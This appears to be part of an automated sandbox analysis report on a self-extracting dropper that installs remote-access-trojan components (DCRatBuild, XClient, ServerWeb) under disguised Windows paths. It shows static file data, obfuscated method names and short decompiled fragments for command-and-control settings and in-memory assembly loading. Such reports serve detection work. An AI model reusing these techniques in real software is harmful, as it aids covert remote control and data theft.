Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Uninstall Information\OfficeClickToRun.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Uninstall Information\e6c9b481da804f

Source: ywXeiXEvP2.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ywXeiXEvP2.exe

Static file information: File size 3817238 > 1048576

Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ywXeiXEvP2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ywXeiXEvP2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: ywXeiXEvP2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Result.exe
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: ywXeiXEvP2.exe

Source: ywXeiXEvP2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ywXeiXEvP2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ywXeiXEvP2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ywXeiXEvP2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ywXeiXEvP2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: XClient.exe.1.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.1.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.3.Result.exe.2642c39.0.raw.unpack, g357BcsySpWm2aqpGZs.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: XClient.exe.1.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe.1.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe.1.dr, Messages.cs	.Net Code: Memory
Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La System.AppDomain.Load(byte[])
Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La System.Reflection.Assembly.Load(byte[])
Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La System.AppDomain.Load(byte[])
Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La System.Reflection.Assembly.Load(byte[])
Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	.Net Code: ITEJwc17La

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4904046

Jump to behavior

Source: ServerWeb.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x365f40
Source: DCRatBuild.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x3b9eb6
Source: Result.exe.0.dr	Static PE information: real checksum: 0x1c302 should be: 0x3e11a9
Source: ywXeiXEvP2.exe	Static PE information: real checksum: 0x0 should be: 0x3ade12
Source: XClient.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x1684f

Source: ywXeiXEvP2.exe	Static PE information: section name: .didat
Source: ywXeiXEvP2.exe	Static PE information: section name: _RDATA
Source: DCRatBuild.exe.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EE28C push eax; ret	2_2_008EE2AA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EED46 push ecx; ret	2_2_008EED59
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 3_2_00007FFD9B7C00AD pushad ; iretd	3_2_00007FFD9B7C00C1
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9B802BB5 pushad ; retf	8_2_00007FFD9B802C41
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9B802BC2 pushad ; retf	8_2_00007FFD9B802C41
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9B827567 push ebx; iretd	8_2_00007FFD9B82756A
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9BAEB0AB push es; retn 7002h	8_2_00007FFD9BAEB519
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9BAE7AFF push cs; ret	8_2_00007FFD9BAE7C1F
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9BAE7B1F push cs; ret	8_2_00007FFD9BAE7C1F
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 37_2_00007FFD9B7C2BB5 pushad ; retf	37_2_00007FFD9B7C2C41
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 37_2_00007FFD9B7C2BC2 pushad ; retf	37_2_00007FFD9B7C2C41
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C2B90 pushad ; retf	38_2_00007FFD9B7C2C41
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C2BB5 pushad ; retf	38_2_00007FFD9B7C2C41
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C2BC2 pushad ; retf	38_2_00007FFD9B7C2C41
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C71E5 push es; iretd	38_2_00007FFD9B7C71E8
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C7DC3 push ds; ret	38_2_00007FFD9B7C7DC4
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802C00 pushad ; retf	41_2_00007FFD9B802C41
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802BB5 pushad ; retf	41_2_00007FFD9B802C41
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802B58 pushad ; retf	41_2_00007FFD9B802C41
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B8071E5 push es; iretd	41_2_00007FFD9B8071E8
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B807DC3 push ds; ret	41_2_00007FFD9B807DC4

Source: 1.0.Result.exe.466afd.1.raw.unpack, J9jqRkoToht6Axav6f.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'NeRaBUW1ToiQmqY3Rwp', 'cxiZinWj72nVAdcXFtW', 'T56YhrWMh1osaNqOjHR', 'BDYUL8WqNK0k69O2F5E', 'RNK64NWUJi0mjGC8VyL', 'OP10UKWnaks2Z2AOno0'
Source: 1.0.Result.exe.466afd.1.raw.unpack, TlC0uIJA6jdOfUly0tI.cs	High entropy of concatenated method names: 'sg9', 'wWeT2aUocN', 'gduZMimUvT', 'NsbTJxswQ9', 'As1xPKrNyMaueOxExPs', 'pWD3APreyNI2m78JVuI', 'shknFTrFElF90iBIH8P', 'aRjImNr4RCOIkcgPCHw', 'O4xtRKrZ94mH3hVpF8j', 'hA8HtDrQvG9hgiwankP'
Source: 1.0.Result.exe.466afd.1.raw.unpack, W4xCsmJwFAc4CDRMHoT.cs	High entropy of concatenated method names: 'KsvmIppiaB', 'Yo0mUc4SBs', 'jH0m3y6rGI', 'OTnmDvIaAB', 'jrnAKc9G447b270KKiT', 'vJ3mXx9C1n90Bua2BQt', 'Ue3DHg9fQhxijGYHUlH', 'iARrC49TL2yxMF6kqyM', 'CxuSBE9t4J44ncF6Uib', 'pnuppE93T9yhSy8suha'
Source: 1.0.Result.exe.466afd.1.raw.unpack, xWhDIfGh8PApjqkB3ox.cs	High entropy of concatenated method names: 'Ik2tedcZ04', 'Om3ApNxsKqbW3n51uul', 'zdQZgoxBJFAGuUsfbH8', 'NG2iqBxmykD2tUFp9QB', 'avWtdSxyyegeVgngFdY', '_1fi', 'vX7SoIoDFB', '_676', 'IG9', 'mdP'
Source: 1.0.Result.exe.466afd.1.raw.unpack, z2U5t67BwbnoCjPv4Xh.cs	High entropy of concatenated method names: '_7zt', 'ul0Lbsx9jl', 'uBWLOCSa2v', 'wvvLdoHtGD', 'tCDLNJT1D0', 'ljELcmUEcg', 'pmdLEcOYDb', 'y7k8cLVrPEIuYX3PGjU', 'sdWW35VLZ4kEC7IsFUC', 'la9BpTV93MMxWANCjIr'
Source: 1.0.Result.exe.466afd.1.raw.unpack, LNcjaT7FXIwmyJicO5F.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 1.0.Result.exe.466afd.1.raw.unpack, x1G6pPDFtsh863ctT4.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'yqpQNVwx5g8fPmLxMCe', 'RhEWc7wgLklpOhO4MWA', 'qPaFTnw4Pa51WPWJeNe', 'qPVxQowZALaoCFqIoGH', 'R7kOyAwNFpCL1y1lM6L', 'n2PpPYweQZBQ1uhDVeB'
Source: 1.0.Result.exe.466afd.1.raw.unpack, YbgphxG5g9Jw5XMqvfv.cs	High entropy of concatenated method names: 'Ieg1cRKl0u', '_1kO', '_9v4', '_294', 'B3E1EoZqlq', 'euj', 'WoR1qHBuiF', 'Ly31VcWfEE', 'o87', 'BMo1kEXC9F'
Source: 1.0.Result.exe.466afd.1.raw.unpack, LA0jeR7ctquxODXu7MJ.cs	High entropy of concatenated method names: 'xeQ7kMVgaWIN9T1cJBo', 'fRvpU0V4ivCGHqAqpL9', 'iuwbFgVZEK2aHwLGsGf', 'meCvnIVEB3HujW43LW7', 'cCZZuYVxrMQSjtJSank'
Source: 1.0.Result.exe.466afd.1.raw.unpack, zsa8dOGEncbuD7NjZD3.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'fU7kqHZXS8', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 1.0.Result.exe.466afd.1.raw.unpack, vfjP2WstDoN9mO43WJ.cs	High entropy of concatenated method names: 'TP2yWtDoN', 'IkxFySth9nD3whLt97', 'PBl4e1BjKXOigQKa02', 'CS0eFKTlJVOsvec85V', 'Uq6nQlG74RHq6By2xe', 'IQuS2JCnJ7NsHFCat7', 'usSaTkVf2', 'QblJnL1ll', 'NWk769qq6', 'Xp4RZ0tii'
Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	High entropy of concatenated method names: 'Bx1JTvsBI3', 'axWJXM5GUp', 'HqOJQDuXeF', 'NatJpQXDBx', 'U7fJhZuoVp', 'j1FJeTfc2c', 'tHLJfWMGkX', 'rCnSXJkHRmil7MaF6wq', 'zDe4lOkryOOR7oWTUJh', 'PTXpl7kLDJsChlQml37'
Source: 1.0.Result.exe.466afd.1.raw.unpack, RtainsGW4fxAhFbG8mU.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'Jo19VKUunB', 'QpH9ke6yvx', 'ikD99iHbbt', 'd7Q9SGmiwK', 'StI9tbeh23', 'AGR91hbTCp', 'BtuFXpE3Sj6CGHhFk7A'
Source: 1.0.Result.exe.466afd.1.raw.unpack, mv5PHLacBSFYVLFlVtf.cs	High entropy of concatenated method names: 'a8J7ddANZF', 'z5K7NLqrcy', 'HrT7c5HjGV', 'Ur67EVZIcl', 'Mqr7q6ry60', 'a09Zc1jlQ5Fkp1Jt3el', 'lrMuNTjptBcusK9YmRb', 'a19V3F1dDI181KJgMCW', 'nA0ijV1z9b9hdKZEkE0', 'j75MhLj56UkFDk6RXal'
Source: 1.0.Result.exe.466afd.1.raw.unpack, NrTABiMLvMcu3Am0Ss.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'dT129dW8EocRGopwult', 'ds5s1cWSaUEsRvsxJAP', 'X88anOWabYXJV5SBjK7', 'LtZ54PWJO2n0NfYEIVc', 'VAhsliWoaN0XlikE5dw', 'toJ22wWdYbwahnCG4EI'
Source: 1.0.Result.exe.466afd.1.raw.unpack, OTnvIa7ZABiAU1abijT.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 1.0.Result.exe.466afd.1.raw.unpack, JUVOIm7RlYOijLikpvR.cs	High entropy of concatenated method names: 'TteKxUdyOO', 'wZtunFcUkQJOoOFbOYk', 'Qq4QUXcnuMXKffT3Pq2', 'hQrsg7cMlG5o9pwAnJS', 'pDDTJmcqtZoQvqkdDFY', 'VlLCimatXa', 'ficCWjMZEv', 'abWCTCW0oa', 'KOnCX3ghAF', 'gNiCQbsCLB'
Source: 1.0.Result.exe.466afd.1.raw.unpack, J7G5cQGNO049YArLSx8.cs	High entropy of concatenated method names: 'qkZkO5X4QS', 'cfokdOAgOt', 'AUnkN3lcV1', 'XHYkcasMv4', 't63kEQ6qTp', 'duxUXM0JtyRW44EHpj6', 'zkcGv50oXgjgonrWr4A', 'hIpwoC0dHeSqWb3IpLP', 'E9DurO0z2kngWE0GhYd', 'rMUvxZYlTUnbwSGXEju'
Source: 1.0.Result.exe.466afd.1.raw.unpack, lGIwbmGXEyGlkwZ4fNQ.cs	High entropy of concatenated method names: 'aqdCpExwqlDruXWT4i3', 'eKr7uvxWiTm6lFgTDoQ', 'JcBmFfx5AZZhF9Ko9MP', 'BwQmvjxAYuUn8HKa1ON', 'MoK9QKmwKx', 'WM4', '_499', 'BOH9poeXOq', 'Iym9hiLCcv', 'RtJ9eKVVOO'
Source: 1.0.Result.exe.466afd.1.raw.unpack, iKm6ibax7bVYVLsjWVD.cs	High entropy of concatenated method names: 'XLIJMD1G6D', 'IOIJnFdR0N', 'x2mFLS6ngyVfnx4wnmo', 'apgX0X6vKIJjsKhByhu', 'lOTYtt69eM0bw65xiUP', 'BRLpgR678bDO6RULWRK', 'MHYM5K6rAsdQOZY9ynr', 'KRQ0Jw6Ltb1Qs3kAX6r', 'B26FY96HbCfng2OA2lV', 'GuSCG66cW36wS9o8Wm9'
Source: 1.0.Result.exe.466afd.1.raw.unpack, s703IyRjy6OOtM6MNFo.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 1.0.Result.exe.466afd.1.raw.unpack, p8kJJFJoqqCLtyZGyuA.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'rhvCFbsPN8', 'LRfTlF7s2H', 'oDrCKnMnTr', 'OKGTA7S6tn', 'JUVsSRLKMCdAoDZ2E8s', 'EyCMYfLR4EWgf5dnOB1', 'jvuEKULfnZ3jlps75ku'
Source: 1.0.Result.exe.466afd.1.raw.unpack, vLS2q9Rno100QGIcjAB.cs	High entropy of concatenated method names: 'vpJVSYBDqc', 'RkKVtWD1xv', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'TAbV10ABwK', '_5f9', 'A6Y'
Source: 1.0.Result.exe.466afd.1.raw.unpack, kcYm2yAxiu8duiBOo3.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'FR0EvjwOfJt4LTiakre', 'trY9aiwPykcg5DAFO82', 'aEdEWIwhuyrMDphvTFD', 'lFRhOrwkhvvttQcL7Yy', 'ztPYSUw6cZGNpjoRteG', 'cBtVTVw1OaVOiZGZk4C'
Source: 1.0.Result.exe.466afd.1.raw.unpack, MywuO0ecBIEDWkejmN.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'V2Ih4YAf3GPHWR9W79M', 'ljZu5fA3nWpx3iyxV8J', 'DMr8OVAKtOxE8KgVOD0', 'sHVIOhARgHOatl6Xv9h', 'EnpilrA0k7U6PHZqmoR', 'LylQ69AYdVrdeVf4J0C'
Source: 1.0.Result.exe.466afd.1.raw.unpack, rHt7uMJCfWa9UHePPBG.cs	High entropy of concatenated method names: 'RSXmXJTWCT', 'zeFmQ34xTc', 'MyDmpVtx3v', 'r2gMmd96TEsbkAmpEtR', 'V3oX6i9hoRq5vFZsXjC', 'a45LGk9kmUhfG56fb54', 'hB3FLF912jKHsxyg6mD', 'Qnmm2DFJ85', 'dEAmrLVT13', 'McPmxMbPGD'
Source: 1.0.Result.exe.466afd.1.raw.unpack, WcHawNutdttSSVMdLiu.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'DtiAUybfglg1rI2lxEa', 'avXXLob3sThGvOOyXf4', 'C1m3xcbKqALkaHyr02u', 'jpwmGGbR9ECWEfRt32G', 'aKv6Y0b0Kilh7vaPRK4', 'IuTffrbYIPYwLOMscqB'
Source: 1.0.Result.exe.466afd.1.raw.unpack, BHb0VlGaagfBmK20jUO.cs	High entropy of concatenated method names: 'mD7kmaKj58', 'NmjkZxMgLf', '_8r1', 'tiukCDPQXf', 'W1UkFOj7TG', 'RVqkKMqLTC', 'd8hkL9vqb7', 'Vc6FlX0jVgtAkSOeLJT', 'HgVEV20MX3Nxi60O2Bh', 'H1VpXo0qw8TKhVfW4rN'
Source: 1.0.Result.exe.466afd.1.raw.unpack, ef7UDCGv7gcEUFZT1op.cs	High entropy of concatenated method names: 'EARV3OyIYC', 'IJ4VDKoCx0', 'cErVHCNGBZ', 'ryDVgQK08h', 'jKMV5L5PGV', 'QSjVoAYUOg', '_838', 'vVb', 'g24', '_9oL'
Source: 1.0.Result.exe.466afd.1.raw.unpack, J0Qd22uZbby0hcTU85o.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'Xidlv6iidhPmlAyN6mU', 'P1MOZ3iDaU5ef7Qi494', 'iyDh2sib7THfe0NTKKi', 'iieZ9TiXe0IshoiWiKl', 'Gu5whiiOm1tcQKZUTUD', 'EJZ8qAiPL34sircwnja'
Source: 1.0.Result.exe.466afd.1.raw.unpack, sy9nlb4UjJR8gEsPiC.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'SnrNErAa8fQm6iVuCUe', 'x3n3fyAJQOPS2UyJ1IQ', 'X5LNUIAoCJXTKSaAQPf', 'Fl15a5Ad56UhGBpceEY', 'N4X4CQAzFKbU1tSoY4E', 'zZxSjAwlfybt4YBjRqe'
Source: 1.0.Result.exe.466afd.1.raw.unpack, PCKnhaJqFcgQEqef9I7.cs	High entropy of concatenated method names: 'eZxZTAVhBN', 'bgRZXOj5Lk', 'MLgB0orUAfjlrdID2Mf', 'ODSMvZrnbieKPa5hUl8', 'jGJLCXrMgRXEtqROiY8', 'Qgo283rq7Gcv69poj2C', 'HB7NCUrv7VYfosJupxK', 'MQxgV4r9t3tTeOMiUSb'
Source: 1.0.Result.exe.466afd.1.raw.unpack, ff8RppJuiGtFdXf28Cx.cs	High entropy of concatenated method names: 'JMCs1VcsXA', 'MDgsiJs4mA', 'aDosW7ZouH', 'LwGsTlkUSf', 'Xn6m2PUzvQZLX401N9M', 'pPx5wAUoAimPpCO1kdd', 'avJg16UdShgaOOJWU3U', 'rYB7MPnl7cfsJHyUDjb', 'ooIaLvnp4NZOCJmUqeY', 'QrWe5gn5UFReTyqZnw8'
Source: 1.0.Result.exe.466afd.1.raw.unpack, W6hetLuEAbhKOOpdNis.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'buRvaHDC5cd0felcx4t', 'o8YwRSDf7jevKmnUEwc', 'FvsMmpD3QUVkA3xr8Ky', 'egw2GGDKy6Oj4vbPwuw', 'AIQv3MDRTgeeY3ZNs0p', 'vm94hdD0VJ3bic8oQUU'
Source: 1.0.Result.exe.466afd.1.raw.unpack, jgeZRtuuWoVL5c6k13I.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'xbtWNw2n63NZBbWOgis', 'hhFgC12vm7GucRlqyyH', 'YJsHUW29nc5NZKpNXYv', 'bNLUD027x1aE4iaY9V1', 'sjpANu2reLArjoGryl0', 'ARyCkh2LS1RjHRC33oQ'
Source: 1.0.Result.exe.466afd.1.raw.unpack, yeQlmn7qaACEmCIw5Xr.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'lGIyvwbmEy', '_3il', 'flkyuwZ4fN', 'Gkyyan4Bhe', '_78N', 'z3K'
Source: 1.0.Result.exe.466afd.1.raw.unpack, rkWbSxue3YUmlTIaIta.cs	High entropy of concatenated method names: 'XTsuM98IqV', 'VQW7J7X3nhI2cAr652f', 'SALUVSXKecWK7N0HLJ4', 'thImEjXCX7Ffj9dfJTE', 'IcBLirXfbEXoL4ySiS5', 'vphbTyXRAnH5rDaffAd', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 1.0.Result.exe.466afd.1.raw.unpack, fNCQZKGtx1VHEenG35h.cs	High entropy of concatenated method names: 'rmP9Z5MjGy', 'FG19CsQjJU', 'M3J9FZWAgt', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'XXw9KXv23w'
Source: 1.0.Result.exe.466afd.1.raw.unpack, QqtijouQ8IvvqFJ7LPx.cs	High entropy of concatenated method names: 'zqDuY7cqcN', 'nOhLjxXHBRMer6h1jM9', 'dG2oOJXcKWfXJj8yJoW', 'pRMZAUXroBKUMimmbXR', 'mluELyXL3uLZKoNBlJd', 'NBVK9aXVkrWWn09F27b', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 1.0.Result.exe.466afd.1.raw.unpack, g5HUDyJUtfPsndj7DmN.cs	High entropy of concatenated method names: '_5u9', 'GCUT5S27ul', 'slwCvbAhGb', 'xyGToDs18J', 'aIk0jhrJbsXMP929EpM', 'cOwcgIroEegYLaBH46t', 'vflGPerd6yffLg731Vh', 'D76O4NrSbeg0WJcChrG', 'qvTWxGragFZbF3yKLNK', 'RHS7ArrzcEbRisiabRq'
Source: 1.0.Result.exe.466afd.1.raw.unpack, Ye9RruubYRRcCcTsZXs.cs	High entropy of concatenated method names: 'nyxu1iu8du', 'SmHkmyDqYHf11oxfhsN', 'pNP058DUCaVLqCccnDL', 'pH6n8MDj3TJdIFbk0XK', 'aQ6UQdDMMqng1fFcVcL', 'VwiSnZDnuJdNNN7YZYx', 'PXblMlDvQTUueTjmySd', 'mAj8BsD9S7S90jpwpuY', 'JDC3iBD73XBdPXO6LFs', 'f28'
Source: 1.0.Result.exe.466afd.1.raw.unpack, pvDVj975CFnUK40X4EC.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'eP5w2DasP1', 'RM5wrDnPV5', 'r8j', 'LS1', '_55S'
Source: 1.0.Result.exe.466afd.1.raw.unpack, JelU0LJLqUaCCMtuWxf.cs	High entropy of concatenated method names: '_223', 'CtHC3E9qtlvnlt2iFpS', 'gPvN3u9UMJDR8N8jnn6', 'uoDScJ9nFsYYDb0ZGb7', 'XkiVS59vFrKDGHWhT1c', 'nvw3Fi99L0jExOV614b', 'YRusbv97vHCQrBCENNb', 'dKacc69rICMeHB7HKci', 'IXyA5Y9LyuYEyjkCrmj', 'Ek844t9Hjrf9fJxn5xN'
Source: 1.0.Result.exe.466afd.1.raw.unpack, V9BBYX7xLOuqhxXjTMf.cs	High entropy of concatenated method names: 'J5NL70skTh', 'yunLRlgP9Z', 'sQOLGatoOC', 'm1XGY8VMf1eO59JjFtI', 'Jv22w7VqeMiqPH3oRgj', 'sHd4hNV1GaRmV073Cyk', 'NtrSHoVjHaqe2k1nD3N', 'iF2uPkVUs8cfpfoIuk9', 'v33IgYVnqGZj3o9mTbc', 'PQxlJRVvmFNPjC7xxqN'
Source: 1.0.Result.exe.466afd.1.raw.unpack, qjbesxY1j409qD7cqc.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'I65A8jWmRkI6ynCHL9V', 'bTOgHiWy2YYW3MPYtia', 'qPFyyRWsGKygSJTY35u', 'GsUYAiWBij1JbPSU0JP', 'pbrd6NWTDhXPRuU5aap', 'T6ToYwWtrB4KUifCH9e'
Source: 1.0.Result.exe.466afd.1.raw.unpack, iFEE2ManVTRtGTQFLd9.cs	High entropy of concatenated method names: 'CXwsVGJsVf', 'NwZ56WUFooG1JYmHA9r', 'YVNlLnUNAZbZ5kZkmFp', 'D6FSKBUeYNvMUk9JdiX', 't9JXbqUQ7tY8iUp61Hm', 'Obi3wWUIM14I81IywGF', 'gRPsBqabyL', 'hSVsbcCKU0', 'uZHsOrEcwX', 'InssdjU29T'
